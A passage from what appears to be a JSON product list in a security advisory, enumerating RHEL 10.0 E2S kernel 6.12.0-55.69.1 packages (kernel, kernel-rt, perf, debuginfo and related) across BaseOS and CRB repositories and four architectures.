"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
